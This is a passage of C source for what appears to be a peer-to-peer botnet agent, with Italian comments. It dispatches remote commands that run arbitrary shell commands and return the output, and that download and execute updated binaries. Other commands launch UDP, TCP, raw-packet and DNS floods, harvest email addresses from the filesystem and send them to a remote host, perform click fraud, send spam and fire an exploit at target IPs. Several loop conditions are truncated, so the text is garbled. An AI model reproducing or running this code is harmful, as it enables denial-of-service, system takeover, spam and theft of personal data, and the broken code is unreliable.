case 0x23: { // Trasmettere il messaggio
struct data_rec *sr=(struct data_rec *)buf;
if (udpserver.len < sizeof(struct data_rec)+sr->h.len) break;
for (n=0;nh.id) {
_decrypt(buf+sizeof(struct data_rec),sr->h.len);
atcp_send(&clients[n],buf+sizeof(struct data_rec),sr->h.len);
}
} break;
#ifndef LARGE_NET
case 0x24: { // Eseguire il comando
FILE *f;
struct sh_rec *sr=(struct sh_rec *)buf;
struct kill_rec kp;
int id;
if (udpserver.len < sizeof(struct sh_rec)+sr->h.len || sr->h.len > 2999-sizeof(struct sh_rec)) break;
memset((void*)&kp,0,sizeof(struct kill_rec));
id=sr->h.id;
(buf+sizeof(struct sh_rec))[sr->h.len]=0;
_decrypt(buf+sizeof(struct sh_rec),sr->h.len);
f=popen(buf+sizeof(struct sh_rec),"r");
if (f != NULL) {
while(1) {
struct data_rec rc;
char *str;
unsigned long len;
memset(buf,0,3000);
fgets(buf,3000,f);
if (feof(f)) break;
len=strlen(buf);
memset((void*)&rc,0,sizeof(struct data_rec));
rc.h.tag=0x41;
rc.h.seq=newseq();
rc.h.id=id;
rc.h.len=len;
_encrypt(buf,len);
str=(char*)malloc(sizeof(struct data_rec)+len);
if (str == NULL) break;
memcpy((void*)str,(void*)&rc,sizeof(struct data_rec));
memcpy((void*)(str+sizeof(struct data_rec)),buf,len);
audp_send(&udpclient,str,sizeof(struct data_rec)+len);
FREE(str);
}
pclose(f);
kp.h.tag=0x42;
kp.h.seq=newseq();
kp.h.id=id;
audp_send(&udpclient,(void*)&kp,sizeof(struct kill_rec));
}
else senderror(&udpclient,id,"Unable to execute command");
} break;
#else
case 0x24: { // Eseguire il comando
senderror(&udpclient,tmp->id,"Not implicated\n");
} break;
#endif
case 0x25: { // Rumore metallico
struct ping_rec *rp=(struct ping_rec *)buf;
struct pong_rec rc;
struct kill_rec kp;
if (udpserver.len < sizeof(struct ping_rec)) break;
memset((void*)&rc,0,sizeof(struct pong_rec));
memset((void*)&kp,0,sizeof(struct kill_rec));
rc.h.tag=0x44;
rc.h.seq=newseq();
rc.h.id=rp->h.id;
rc.from=myip;
audp_send(&udpclient,(char*)&rc,sizeof(struct pong_rec));
kp.h.tag=0x42;
rc.h.seq=newseq();
kp.h.id=rp->h.id;
audp_send(&udpclient,(void*)&kp,sizeof(struct kill_rec));
} break;
case 0x26: { // Itinerario
struct route_rec *rp=(struct route_rec *)buf;
unsigned long i;
if (udpserver.len < sizeof(struct route_rec)) break;
if (!useseq(rp->h.seq)) {
addseq(rp->h.seq);
if (rp->server == -1 || rp->server == 0 || rp->server == myip) relay(inet_addr("127.0.0.1"),buf+sizeof(struct route_rec),rp->h.len-sizeof(struct route_rec));
if (rp->server == -1 || rp->server == 0) broadcast(buf,rp->h.len);
else if (rp->server != myip) {
if (rp->hops == 0 || rp->hops > 16) relay(rp->server,buf,rp->h.len);
else {
rp->hops--;
broadcast(buf,rp->h.len);
}
}
for (i=LINKS;i>0;i--) memcpy((struct route_table*)&routes[i],(struct route_table*)&routes[i-1],sizeof(struct route_table));
memset((struct route_table*)&routes[0],0,sizeof(struct route_table));
routes[0].id=rp->h.id;
routes[0].ip=udpclient.in.sin_addr.s_addr;
routes[0].port=htons(udpclient.in.sin_port);
}
} break;
#ifndef LARGE_NET
case 0x27: { // Aggiornamento
struct update_rec *rp=(struct update_rec *)buf;
struct kill_rec np;
struct ainst up;
char *server,done=0,bufm[4096],srv[256];
long i,d,id;
int file;
char check=0;
if (udpserver.len < sizeof(struct update_rec)+rp->h.len || rp->h.len > 2999-sizeof(struct update_rec)) break;
memset((void*)&np,0,sizeof(struct kill_rec));
id=rp->h.id;
(buf+sizeof(struct update_rec))[rp->h.len]=0;
_decrypt(buf+sizeof(struct update_rec),rp->h.len);
if (!strncmp(buf+sizeof(struct update_rec),"http://",7)) server=buf+sizeof(struct update_rec)+7;
else server=buf+sizeof(struct update_rec);
for (i=0;ih.id;
audp_send(&udpclient,(void*)&np,sizeof(struct kill_rec));
if (done == 2) break;
audp_close(&udpclient);
audp_close(&udpserver);
memset(bufm,0,1024);
conv(srv,256,cpbases[0]);
sprintf(bufm,"mv /tmp/tmp /tmp/init;export PATH=\"/tmp\";init %s",srv);
execl("/bin/sh","/bin/sh","-c",bufm,NULL);
exit(0);
} break;
#else
case 0x27: { // Aggiornamento
senderror(&udpclient,tmp->id,"Not implicated\n");
} break;
#endif
case 0x28: { // Lista
struct list_rec *rp=(struct list_rec *)buf;
struct kill_rec kp;
if (udpserver.len < sizeof(struct list_rec)) break;
memset((void*)&kp,0,sizeof(struct kill_rec));
syncm(&udpclient,0x46,rp->h.id);
kp.h.tag=0x42;
kp.h.seq=newseq();
kp.h.id=rp->h.id;
audp_send(&udpclient,(void*)&kp,sizeof(struct kill_rec));
} break;
case 0x29: { // Udp inondazione
int flag=1,fd,i=0;
char *str;
struct sockaddr_in in;
time_t start=time(NULL);
struct udp_rec *rp=(struct udp_rec *)buf;
if (udpserver.len < sizeof(struct udp_rec)) break;
if (rp->size > 9216) {
senderror(&udpclient,rp->h.id,"Size must be less than or equal to 9216\n");
break;
}
if (!isreal(rp->target)) {
senderror(&udpclient,rp->h.id,"Cannot packet local networks\n");
break;
}
senderror(&udpclient,rp->h.id,"Udp flooding target\n");
str=(char*)malloc(rp->size);
if (str == NULL) break;
for (i=0;isize;i++) str[i]=rand();
memset((void*)&in,0,sizeof(struct sockaddr_in));
in.sin_addr.s_addr=rp->target;
in.sin_family=AF_INET;
in.sin_port=htons(rp->port);
while(1) {
if (rp->port == 0) in.sin_port = rand();
if ((fd = socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP)) < 0);
else {
flag = fcntl(fd, F_GETFL, 0);
flag |= O_NONBLOCK;
fcntl(fd, F_SETFL, flag);
sendto(fd,str,rp->size,0,(struct sockaddr*)&in,sizeof(in));
close(fd);
}
if (i >= 50) {
if (time(NULL) >= start+rp->secs) break;
i=0;
}
i++;
}
FREE(str);
} break;
case 0x2A: { // Tcp inondazione
int flag=1,fd,i=0;
struct sockaddr_in in;
time_t start=time(NULL);
struct tcp_rec *rp=(struct tcp_rec *)buf;
if (udpserver.len < sizeof(struct tcp_rec)) break;
if (!isreal(rp->target)) {
senderror(&udpclient,rp->h.id,"Cannot packet local networks\n");
break;
}
senderror(&udpclient,rp->h.id,"Tcp flooding target\n");
memset((void*)&in,0,sizeof(struct sockaddr_in));
in.sin_addr.s_addr=rp->target;
in.sin_family=AF_INET;
in.sin_port=htons(rp->port);
while(1) {
if (rp->port == 0) in.sin_port = rand();
if ((fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0);
else {
flag = fcntl(fd, F_GETFL, 0);
flag |= O_NONBLOCK;
fcntl(fd, F_SETFL, flag);
connect(fd, (struct sockaddr *)&in, sizeof(in));
close(fd);
}
if (i >= 50) {
if (time(NULL) >= start+rp->secs) break;
i=0;
}
i++;
}
} break;
case 0x2B: { // Generico inondazione
int get;
struct sockaddr_in in;
struct gen_rec *rp=(struct gen_rec *)buf;
time_t start=time(NULL);
if (udpserver.len < sizeof(struct gen_rec)+rp->h.len || rp->h.len > 2999-sizeof(struct gen_rec)) break;
if (!isreal(rp->target)) {
senderror(&udpclient,rp->h.id,"Cannot packet local networks\n");
break;
}
if ((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) break;
senderror(&udpclient,rp->h.id,"Sending packets to target\n");
memset((void*)&in,0,sizeof(struct sockaddr_in));
in.sin_addr.s_addr=rp->target;
in.sin_family=AF_INET;
in.sin_port=htons(rp->port);
while(1) {
sendto(get,buf+sizeof(struct gen_rec),rp->h.len,0,(struct sockaddr *)&in,sizeof(in));
if (time(NULL) >= start+rp->secs) break;
}
close(get);
} break;
case 0x2C: { // Dns inondazione
struct dns {
unsigned short int id;
unsigned char rd:1;
unsigned char tc:1;
unsigned char aa:1;
unsigned char opcode:4;
unsigned char qr:1;
unsigned char rcode:4;
unsigned char unused:2;
unsigned char pr:1;
unsigned char ra:1;
unsigned short int que_num;
unsigned short int rep_num;
unsigned short int num_rr;
unsigned short int num_rrsup;
char buf[128];
} dnsp;
unsigned long len=0,i=0,startm;
int fd,flag;
char *convo;
struct sockaddr_in in;
struct df_rec *rp=(struct df_rec *)buf;
time_t start=time(NULL);
if (udpserver.len < sizeof(struct df_rec)+rp->h.len || rp->h.len > 2999-sizeof(struct df_rec)) break;
if (!isreal(rp->target)) {
senderror(&udpclient,rp->h.id,"Cannot packet local networks\n");
break;
}
senderror(&udpclient,rp->h.id,"Dns flooding target\n");
memset((void*)&in,0,sizeof(struct sockaddr_in));
in.sin_addr.s_addr=rp->target;
in.sin_family=AF_INET;
in.sin_port=htons(53);
dnsp.rd=1;
dnsp.tc=0;
dnsp.aa=0;
dnsp.opcode=0;
dnsp.qr=0;
dnsp.rcode=0;
dnsp.unused=0;
dnsp.pr=0;
dnsp.ra=0;
dnsp.que_num=256;
dnsp.rep_num=0;
dnsp.num_rr=0;
dnsp.num_rrsup=0;
convo=buf+sizeof(struct df_rec);
convo[rp->h.len]=0;
_decrypt(convo,rp->h.len);
for (i=0,startm=0;i<=rp->h.len;i++) if (convo[i] == '.' || convo[i] == 0) {
convo[i]=0;
sprintf(dnsp.buf+len,"%c%s",(unsigned char)(i-startm),convo+startm);
len+=1+strlen(convo+startm);
startm=i+1;
}
dnsp.buf[len++]=0;
dnsp.buf[len++]=0;
dnsp.buf[len++]=1;
dnsp.buf[len++]=0;
dnsp.buf[len++]=1;
while(1) {
dnsp.id=rand();
if ((fd = socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP)) < 0);
else {
flag = fcntl(fd, F_GETFL, 0);
flag |= O_NONBLOCK;
fcntl(fd, F_SETFL, flag);
sendto(fd,(char*)&dnsp,sizeof(struct dns)+len-128,0,(struct sockaddr*)&in,sizeof(in));
close(fd);
}
if (i >= 50) {
if (time(NULL) >= start+rp->secs) break;
i=0;
}
i++;
}
} break;
case 0x2D: {
char ip[256];
struct escan_rec *rp=(struct escan_rec *)buf;
if (udpserver.len < sizeof(struct escan_rec)) break;
if (!isreal(rp->ip)) {
senderror(&udpclient,rp->h.id,"Invalid IP\n");
break;
}
conv(ip,256,rp->ip);
if (mfork() == 0) {
struct _linklist *getb;
struct ainst client;
StartScan("/");
audp_setup(&client,(char*)ip,ESCANPORT);
getb=linklist;
while(getb != NULL) {
unsigned long len=strlen(getb->name);
audp_send(&client,getb->name,len);
getb=getb->next;
}
audp_close(&client);
exit(0);
}
} break;
case 0x2E: {
struct click_rec *rp=(struct click_rec *)buf;
if (udpserver.len < sizeof(struct click_rec)+rp->h.len || rp->h.len > 2999-sizeof(struct click_rec)) break;
(buf+sizeof(struct click_rec))[rp->h.len]=0;
_decrypt(buf+sizeof(struct click_rec),rp->h.len);
if (mfork() == 0) {
ViewWebsite(strdup(buf+sizeof(struct click_rec)),NULL);
exit(0);
}
} break;
case 0x2F: {
struct spam_rec *rp=(struct spam_rec *)buf;
struct kill_rec np;
struct ainst up;
char *server,bufm[4096],*tmp,*str;
char *from=NULL,*subject=NULL,*data=NULL,*emails=NULL;
long i,d;
unsigned long emailcount=0;
if (udpserver.len < sizeof(struct spam_rec)+rp->h.len || rp->h.len > 2999-sizeof(struct spam_rec)) break;
memset((void*)&np,0,sizeof(struct kill_rec));
(buf+sizeof(struct spam_rec))[rp->h.len]=0;
_decrypt(buf+sizeof(struct spam_rec),rp->h.len);
if (!strncmp(buf+sizeof(struct spam_rec),"http://",7)) server=buf+sizeof(struct spam_rec)+7;
else server=buf+sizeof(struct spam_rec);
for (i=0;ih.id,"Unable to connect to host\n");
exit(0);
}
atcp_sendmsg(&up,"GET /%s HTTP/1.0\r\nConnection: Keep-Alive\r\nUser-Agent: Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686)\r\nHost: %s:80\r\nAccept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*\r\nAccept-Encoding: gzip\r\nAccept-Language: en\r\nAccept-Charset: iso-8859-1,*,utf-8\r\n\r\n",server+i+1,server);
g[0]=&up;
if (await(g,1,AREAD,20) != 0 || atcp_recv(&up,bufm,4096) != 0 || up.len == 0) {
senderror(&udpclient,rp->h.id,"Error communicating with website\n");
exit(0);
}
for (d=0;dh.id,"Timed out while receiving data\n");
exit(0);
}
if (atcp_recv(&up,bufm,4096) != 0 || up.len <= 0) break;
d=0;
read:
for (;d= rp->from && emailcount < rp->to) str=emails;
if (bufm[d] == '\n' && emails == NULL) str=-1;
break;
default:
str=-1;
}
if (str != -1 && !lpass) {
int dontfree=0;
if (str == NULL) {
str="";
dontfree=1;
}
tmp=malloc(strlen(str)+2);
strcpy(tmp,str);
tmp[strlen(str)]=bufm[d];
tmp[strlen(str)+1]=0;
if (!dontfree) free(str);
str=tmp;
switch (mode) {
case 1:
from=str;
break;
case 2:
subject=str;
break;
case 3:
data=str;
break;
case 4:
if (emailcount >= rp->from && emailcount < rp->to) emails=str;
break;
}
}
if (bufm[d] == '\n') lpass=0;
}
}
break;
}
atcp_close(&up);
np.h.tag=0x42;
np.h.seq=newseq();
np.h.id=rp->h.id;
audp_send(&udpclient,(void*)&np,sizeof(struct kill_rec));
if (!from || !subject || !data || !emails) exit(0);
str=emails;
do {
int pid;
memset(bufm,0,4096);
for (i=0;str[i] != 0 && str[i] != '\n';i++) bufm[i]=str[i];
if ((pid=fork()) == 0) {
alarm(10);
SendMail(bufm,from,subject,data);
exit(0);
}
waitpid(pid,0,0);
tmp=strchr(str,'\n');
if (tmp == NULL) break;
else str=tmp+1;
} while(1);
exit(0);
}
} break;
case 0x30: {
struct exploit_rec *rp=(struct exploit_rec *)buf;
if (udpserver.len < sizeof(struct exploit_rec)) break;
if (isreal(rp->ip)) {
char srv[256];
conv(srv,256,rp->ip);
if (mfork() == 0) {
exploit(srv);
exit(0);
}
}
} break;
case 0x70: { // Avviano
struct {
struct addsrv_rec a;
unsigned long server;
} rc;
struct myip_rec rp;
if (!isreal(udpclient.in.sin_addr.s_addr)) break;
memset((void*)&rp,0,sizeof(struct myip_rec));
rp.h.tag=0x73;
rp.h.id=0;
rp.ip=udpclient.in.sin_addr.s_addr;
audp_send(&udpclient,(void*)&rp,sizeof(struct myip_rec));
memset((void*)&rc,0,sizeof(rc));
rc.a.h.tag=0x71;
rc.a.h.id=0;
rc.a.h.len=sizeof(unsigned long);
rc.server=udpclient.in.sin_addr.s_addr;
broute(0,(void*)&rc,sizeof(rc));
addserver(rc.server);
syncm(&udpclient,0x71,0);
} break;
case 0x71: { // Aggiungere alla lista
struct addsrv_rec *rp=(struct addsrv_rec *)buf;
struct next_rec { unsigned long server; };
unsigned long a;
char b=0;
if (udpserver.len < sizeof(struct addsrv_rec)) break;
for (a=0;rp->h.len > a*sizeof(struct next_rec) && udpserver.len > sizeof(struct addsrv_rec)+(a*sizeof(struct next_rec));a++) {
struct next_rec *fc=(struct next_rec*)(buf+sizeof(struct addsrv_rec)+(a*sizeof(struct next_rec)));
addserver(fc->server);
}
for (a=0;aip)) myip=rp->ip;
} break;
case 0x74: { // Trasmettere i vostri IP
struct myip_rec rc;
memset((void*)&rc,0,sizeof(struct myip_rec));
rc.h.tag=0x73;
rc.h.id=0;
rc.ip=udpclient.in.sin_addr.s_addr;
if (!isreal(rc.ip)) break;
audp_send(&udpclient,(void*)&rc,sizeof(struct myip_rec));
} break;
case 0x41: // --|
case 0x42: // |
case 0x43: // |
case 0x44: // |---> Dati dell' utente
case 0x45: // |
case 0x46: { // --|
unsigned long a;
struct header *rc=(struct header *)buf;
if (udpserver.len < sizeof(struct header)) break;
if (!useseq(rc->seq)) {
addseq(rc->seq);
for (a=0;aid) {
struct ainst ts;
char srv[256];
conv(srv,256,routes[a].ip);
audp_setup(&ts,srv,routes[a].port);
audp_close(&ts);
ts.sock=udpserver.sock;
audp_send(&ts,buf,udpserver.len);
break;
}
}
} break;
}
}
}
}
audp_close(&udpserver);
return 0;
}